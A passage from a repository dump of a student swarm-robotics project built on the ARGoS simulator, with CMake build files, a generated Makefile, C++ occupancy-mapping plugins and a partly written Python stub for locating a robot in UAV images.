end_color):\n#TODO: figure out how opencv works and use it for this\n\treturn image\n\n#finds the midpoint of a line formed by 2 points in an image - used 
to determine where\n#the robot is in the UAV's frame of reference\ndef getMidpoint(image):\n\tcentroids = getCentroids(image)\n\tx1 = centroids[1].x\n\tx2 = centroids[2].x\n\ty1 = centroids[1].y\n\ty2 = centroids[2].y\n\txmid = abs(x1+x2)/2\n\tymid = abs(y1+y2)/2\n\txycoords = [xmid ymid]\n\treturn xycoords\n#get the centers of circles in an image and return them as xy coordinate pairs in a list\ndef getCentroids(image):\n#TODO: Figure out how opencv works and use it for this\n\treturn centroids\n#angle of line in image; shows orientation of the robot with respect to UAV reference frame\ndef getAngle(image):\n\t#make a triangle\n\tcentroids = getCentroids(image)\n\tx1 = centroids[1].x\n\tx2 = centroids[2].x\n\ty1 = centroids[1].y\n\ty2 = centroids[2].y\n\txleg = abs(x1-x2)+x1\n\tyleg = abs(y1-y2)+y1\n\tanglerot = arctan(yleg/xleg)\n\treturn anglerot\n\n\n" }, { "alpha_fraction": 0.773553729057312, "alphanum_fraction": 0.7785124182701111, "avg_line_length": 27.85714340209961, "blob_id": "bcb6663d99920683caa2c4866e4b143ddf8fd953", "content_id": "bc71794249e6d9545e7c620b7133f739489d47cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 605, "license_type": "no_license", "max_line_length": 83, "num_lines": 21, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n occupancy_visualizer.h)\n\nset(SOURCES\n occupancy_visualizer.cpp)\n\ninclude_directories(../../../build)\n\nadd_library(occupancy_visualizer SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(occupancy_visualizer\n argos3core_simulator\n argos3plugin_simulator_entities\n argos3plugin_simulator_qtopengl\n ${ARGOS_QTOPENGL_LIBRARIES}\n occupancy_medium)\n\ninstall(TARGETS occupancy_visualizer DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} 
${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.7995391488075256, "alphanum_fraction": 0.7995391488075256, "avg_line_length": 35.16666793823242, "blob_id": "5fc28a8e241cb58ee7626acd6466278aed643beb", "content_id": "22bf5102de9d338d6506c4482a9fa5faafe8a521", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 434, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/CMakeFiles/kheperaiv_occupancy.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"kheperaiv_occupancy_automoc.cpp\"\n \"CMakeFiles/kheperaiv_occupancy.dir/kheperaiv_occupancy_controller.cpp.o\"\n \"CMakeFiles/kheperaiv_occupancy.dir/kheperaiv_occupancy_automoc.cpp.o\"\n \"libkheperaiv_occupancy.pdb\"\n \"libkheperaiv_occupancy.so\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/kheperaiv_occupancy.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 35.5, "blob_id": "6c494121afb9d451978d306be74efcb4009092c4", "content_id": "673474463ddc75656ee4991328801f0279f12168", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 72, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(occupancy_visualizer)\nadd_subdirectory(octomap_manager)" }, { "alpha_fraction": 0.7747440338134766, "alphanum_fraction": 0.7815699577331543, "avg_line_length": 26.952381134033203, "blob_id": "2fb53cc9ba8f3c3d3a14340b18d32e6f8ef744c7", "content_id": 
"17187625267699e422c55b57bc6553e17371d240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 586, "license_type": "no_license", "max_line_length": 83, "num_lines": 21, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n octomap_manager.h)\n\nset(SOURCES\n octomap_manager.cpp)\n\nadd_library(octomap_manager SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(octomap_manager\n argos3core_simulator\n argos3plugin_simulator_entities\n argos3plugin_simulator_kheperaiv\n kheperaiv_exploration\n argos3plugin_simulator_qtopengl\n ${ARGOS_QTOPENGL_LIBRARIES}\n )\n\ninstall(TARGETS octomap_manager DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.7518159747123718, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 26.566667556762695, "blob_id": "9d17fec0d76e48414bb276f66b7999218cc71b1a", "content_id": "1b7eb31b6249ffde85bf645fd09c3c45d4fe474a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 87, "num_lines": 30, "path": "/ugv_exploration/plugins/loop_functions/octomap_manager/octomap_manager.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <argos3/core/utility/datatypes/any.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_entity.h>\n\n#include <plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.h>\n\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n\n#include \"octomap_manager.h\"\n\nvoid CLoopOctomapManager::Init (TConfigurationNode& t_tree) {\n\tm_KheperaMap = 
GetSpace().GetEntitiesByType(\"kheperaiv\");\n\tm_OcMap.setClampingThresMin(.1);\n\tm_OcMap.setClampingThresMax(.9);\n\tm_OcMap.setProbHit(.7);\n\tm_OcMap.setProbMiss(.3);\n\t//m_OcMap.setOccupancyThres(0.5);\n\n}\n\nvoid CLoopOctomapManager::insertRay() {\n\tstd::cout << \"\\n----insert ray called!----\" << std::endl;\n}\n\nvoid CLoopOctomapManager::PostStep() {\n}\n\n//CLoopOctomapManager::\n\nREGISTER_LOOP_FUNCTIONS(CLoopOctomapManager, \"octomap_manager\")" }, { "alpha_fraction": 0.5322874784469604, "alphanum_fraction": 0.5370302796363831, "avg_line_length": 30.159090042114258, "blob_id": "3a524e79f9ca0f8c17a44230d9181facce1799ca", "content_id": "1b350e4f666ef0d64e3ed2e332e1c8c7a0d240a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2741, "license_type": "no_license", "max_line_length": 97, "num_lines": 88, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/simulator/occupancy_default_actuator.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include <string>\n#include <map>\n\n#include \"occupancy_default_actuator.h\"\n#include <argos3/core/simulator/simulator.h>\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::SetRobot(CComposableEntity& c_entity){\n m_pcEmbodiedEntity = &(c_entity.GetComponent<CEmbodiedEntity>(\"body\"));\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Init(TConfigurationNode& t_tree){\n try {\n /* Parent class init */\n CCI_OccupancyActuator::Init(t_tree);\n /* Get pheromone medium from id specified in the XML */\n std::string strMedium;\n GetNodeAttribute(t_tree, \"medium\", strMedium);\n m_pCOccupancyMedium = &(CSimulator::GetInstance().GetMedium<COccupancyMedium>(strMedium));\n }\n catch(CARGoSException& ex) {\n THROW_ARGOSEXCEPTION_NESTED(\"Error initializing the range and bearing medium sensor\", 
ex);\n }\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Update(){\n auto size = m_occupancy_list.size();\n for(int i = 0; i < size; i++) {\n m_pCOccupancyMedium->SetOccupancy(m_occupancy_list.front());\n m_occupancy_list.pop_front();\n } \n}\n\nvoid COccupancyActuator::SetOccupancy(Real dist) {\n LOG << \"Setting occupancy for \" + std::to_string(dist) << std::endl;\n //Get the position wrt the global frame\n CVector3 global_robot_location = m_pcEmbodiedEntity->GetOriginAnchor().Position;\n //Get the orientation\n CQuaternion global_robot_orientation = m_pcEmbodiedEntity->GetOriginAnchor().Orientation;\n\n //Make a vector in the x direction\n CVector3 local_vec = CVector3(dist, 0.0, 0.0);\n //rotate it by the quaternion\n local_vec.Rotate(global_robot_orientation);\n\n //add the two vectors together to get the location of the object\n global_robot_location += local_vec;\n\n //Make it twoD\n CVector2 obj_location = CVector2(global_robot_location.GetX(), global_robot_location.GetY());\n\n LOG << obj_location<< std::endl;\n m_occupancy_list.push_front(obj_location);\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Reset(){\n bLayingPheromone = false;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyActuator::Destroy(){\n\n}\n\n/****************************************/\n/****************************************/\n\nREGISTER_ACTUATOR(COccupancyActuator,\n \"occupancy\", \"default\",\n \"Chris Cormier [[email protected]]\",\n \"0.1\",\n \"A generic occupancy actuator.\",\n \"\",\n \"\"\n);" }, { "alpha_fraction": 0.8167388439178467, "alphanum_fraction": 0.8282828330993652, "avg_line_length": 52.30769348144531, "blob_id": "f335ce536db773d796e22317d81d0a006d336725", "content_id": "849c19a6cb3a8397ffd7490c57082c4fda19e673", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "CMake", "length_bytes": 693, "license_type": "no_license", "max_line_length": 114, "num_lines": 13, "path": "/ugv_exploration/plugins/robots/generic/CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"argos3plugin_simulator_generic_occupancy_automoc.cpp\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/control_interface/ci_occupancy_actuator.cpp.o\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/simulator/occupancy_default_actuator.cpp.o\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/argos3plugin_simulator_generic_occupancy_automoc.cpp.o\"\n \"libargos3plugin_simulator_generic_occupancy.pdb\"\n \"libargos3plugin_simulator_generic_occupancy.so\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang CXX)\n include(CMakeFiles/argos3plugin_simulator_generic_occupancy.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.8263305425643921, "alphanum_fraction": 0.8347339034080505, "avg_line_length": 43.75, "blob_id": "7b05d6194ad2a961d880ee81e6a577fc667cf928", "content_id": "57d76fc71b59e4c8cdf5f37ea6235fe7d6852caa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 357, "license_type": "no_license", "max_line_length": 82, "num_lines": 8, "path": "/obstexample/plugins/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_library(footbot_diffusion_cp SHARED footbot_diffusion.h footbot_diffusion.cpp)\n\n#install(TARGETS file_name DESTINATION ${CMAKE_BINARY_DIR}/dest_file_directory)\n#destination file is relative to cmake binary directory\ntarget_link_libraries(footbot_diffusion_cp\n argos3core_simulator\n argos3plugin_simulator_footbot\n argos3plugin_simulator_genericrobot)" }, { "alpha_fraction": 0.8059701323509216, 
"alphanum_fraction": 0.8149253726005554, "avg_line_length": 36.22222137451172, "blob_id": "4304dafa04240fd541663e891a29f93fe790735d", "content_id": "029065f5e4b3fca6f4bd846fcc4de0ba36e85c9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 335, "license_type": "no_license", "max_line_length": 109, "num_lines": 9, "path": "/ugv_exploration/plugins/robots/generic/CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"argos3plugin_simulator_generic_occupancy_automoc.cpp\"\n \"CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/argos3plugin_simulator_generic_occupancy_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.7533086538314819, "alphanum_fraction": 0.7623081207275391, "avg_line_length": 26.376811981201172, "blob_id": "7778cba62f45adcf9d9b270890613ea5d38db833", "content_id": "1e4e99bc5d375d194182a63b31b72ca955228951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1889, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": "/obstexample/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "cmake_minimum_required (VERSION 2.6)\n\nproject (obstacle_avoidance)\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_SOURCE_DIR}/cmake)\n\n# Deactivate RPATH for MacOSX\nset(CMAKE_MACOSX_RPATH 0)\n\nset(Lua52_DIR)\nfind_package(Lua52)\nif(LUA52_FOUND)\n set(ARGOS_WITH_LUA ON)\n include_directories(${LUA_INCLUDE_DIR})\nendif(LUA52_FOUND)\n\n#\n# Check for ARGoS3\n#\n# Find the ARGoS package, make sure to save the ARGoS prefix\nfind_package(PkgConfig)\npkg_check_modules(ARGOS REQUIRED argos3_simulator)\nset(ARGOS_PREFIX 
${ARGOS_PREFIX} CACHE INTERNAL \"\")\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${ARGOS_PREFIX}/share/argos3/cmake)\n# Set ARGoS include dir\ninclude_directories(${ARGOS_INCLUDE_DIRS})\n# Set ARGoS link dir\nlink_directories(${ARGOS_LIBRARY_DIRS})\n\n# Check whether all the necessary libs have been installed to compile the\n# code that depends on Qt and OpenGL\ninclude(ARGoSCheckQTOpenGL)\n\n#\n# Add repository directory to the list of includes\n# This makes it possible to say #include <argos3/...> with\n# repository includes.\n#\ninclude_directories(${CMAKE_SOURCE_DIR})\n\n# add buzz to the module path\n# set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} /usr/local/share/buzz/cmake)\n\n# Look for Buzz tools, libraries, and headers\nfind_package(Buzz)\nif(BUZZ_FOUND)\n # Define Buzz-related commands\n include(UseBuzz)\n include_directories(${BUZZ_C_INCLUDE_DIR})\nendif(BUZZ_FOUND)\n\n# use, i.e. don't skip the full RPATH for the build tree\nset(CMAKE_SKIP_BUILD_RPATH FALSE)\n\n# when building, don't use the install RPATH already\n# (but later on when installing)\nset(CMAKE_BUILD_WITH_INSTALL_RPATH FALSE)\n\n# add the automatically determined parts of the RPATH\n# which point to directories outside the build tree to the install RPATH\nset(CMAKE_INSTALL_RPATH_USE_LINK_PATH TRUE)\n\n\nset(CMAKE_CXX_STANDARD 11)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\n\nadd_subdirectory(plugins)\n\nset(CMAKE_CXX_EXTENSIONS OFF)\n" }, { "alpha_fraction": 0.7344398498535156, "alphanum_fraction": 0.7468879818916321, "avg_line_length": 25.88888931274414, "blob_id": "112497dd1710d68ae277777574232f78b0885ca7", "content_id": "fdf400c203fcf1498bb1d11261ca62f85ae8f570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 241, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/control_interface/ci_occupancy_actuator.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": 
"UTF-8", "text": "#include \"ci_occupancy_actuator.h\"\n\nCCI_OccupancyActuator::CCI_OccupancyActuator():\n m_unStrength(255),\n bLayingPheromone(false){}\n\n#ifdef ARGOS_WITH_LUA\n void CCI_OccupancyActuator::CreateLuaState(lua_State* pt_lua_state){ }\n#endif" }, { "alpha_fraction": 0.7433818578720093, "alphanum_fraction": 0.7447494268417358, "avg_line_length": 36.4945068359375, "blob_id": "8ecc08d513d777218df94b04dc35f1d363fe5dca", "content_id": "8ad0410d24b0fe6af0d8fa16da6db8a3ab5a5584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 10237, "license_type": "no_license", "max_line_length": 258, "num_lines": 273, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/Makefile", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source 
directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target 
install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(CMAKE_COMMAND) -E cmake_progress_start /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/CMakeFiles /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/plugins/simulator/media/CMakeFiles/progress.marks\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && 
$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nplugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n.PHONY : plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n\n# Convenience name for target.\noccupancy_medium: plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n\n.PHONY : occupancy_medium\n\n# fast build rule for target.\noccupancy_medium/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build\n.PHONY : occupancy_medium/fast\n\n# Convenience name for target.\nplugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n.PHONY : plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n\n# Convenience name for target.\noccupancy_medium_automoc: plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n\n.PHONY : occupancy_medium_automoc\n\n# fast build rule for target.\noccupancy_medium_automoc/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/build\n.PHONY : occupancy_medium_automoc/fast\n\noccupancy_medium.o: occupancy_medium.cpp.o\n\n.PHONY : occupancy_medium.o\n\n# target to build an object file\noccupancy_medium.cpp.o:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make 
plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.o\n.PHONY : occupancy_medium.cpp.o\n\noccupancy_medium.i: occupancy_medium.cpp.i\n\n.PHONY : occupancy_medium.i\n\n# target to preprocess a source file\noccupancy_medium.cpp.i:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.i\n.PHONY : occupancy_medium.cpp.i\n\noccupancy_medium.s: occupancy_medium.cpp.s\n\n.PHONY : occupancy_medium.s\n\n# target to generate assembly for a file\noccupancy_medium.cpp.s:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.s\n.PHONY : occupancy_medium.cpp.s\n\noccupancy_medium_automoc.o: occupancy_medium_automoc.cpp.o\n\n.PHONY : occupancy_medium_automoc.o\n\n# target to build an object file\noccupancy_medium_automoc.cpp.o:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.o\n.PHONY : occupancy_medium_automoc.cpp.o\n\noccupancy_medium_automoc.i: occupancy_medium_automoc.cpp.i\n\n.PHONY : occupancy_medium_automoc.i\n\n# target to preprocess a source file\noccupancy_medium_automoc.cpp.i:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.i\n.PHONY : occupancy_medium_automoc.cpp.i\n\noccupancy_medium_automoc.s: occupancy_medium_automoc.cpp.s\n\n.PHONY : occupancy_medium_automoc.s\n\n# target to generate assembly for a file\noccupancy_medium_automoc.cpp.s:\n\tcd 
/home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.s\n.PHONY : occupancy_medium_automoc.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install\"\n\t@echo \"... list_install_components\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... occupancy_medium\"\n\t@echo \"... install/strip\"\n\t@echo \"... install/local\"\n\t@echo \"... edit_cache\"\n\t@echo \"... occupancy_medium_automoc\"\n\t@echo \"... occupancy_medium.o\"\n\t@echo \"... occupancy_medium.i\"\n\t@echo \"... occupancy_medium.s\"\n\t@echo \"... occupancy_medium_automoc.o\"\n\t@echo \"... occupancy_medium_automoc.i\"\n\t@echo \"... occupancy_medium_automoc.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n" }, { "alpha_fraction": 0.6619032025337219, "alphanum_fraction": 0.667749285697937, "avg_line_length": 37.5, "blob_id": "f7f94a93b772138bd469d1c7ad12e3616b1ea36e", "content_id": "97abf19fa7baed9c07e1d94dfdb0cd2c0901f584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 103, "num_lines": 80, "path": 
"/ugv_exploration/plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "/* Include the controller definition */\n#include \"kheperaiv_exploration_controller.h\"\n#include <octomap_manager.h>\n/* Function definitions for XML parsing */\n#include <argos3/core/utility/configuration/argos_configuration.h>\n/* 2D vector definition */\n#include <argos3/core/utility/math/vector2.h>\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n/**/\n#include <argos3/core/utility/logging/argos_log.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n#include <math.h>\n#include <argos3/core/control_interface/ci_sensor.h>\n\n#include <argos3/core/control_interface/ci_sensor.h>\n#include <argos3/core/utility/math/angles.h>\n\n\n\ntypedef CCI_KheperaIVUltrasoundSensor::TReadings TReadings;\ntypedef struct CCI_KheperaIVUltrasoundSensor::SReading 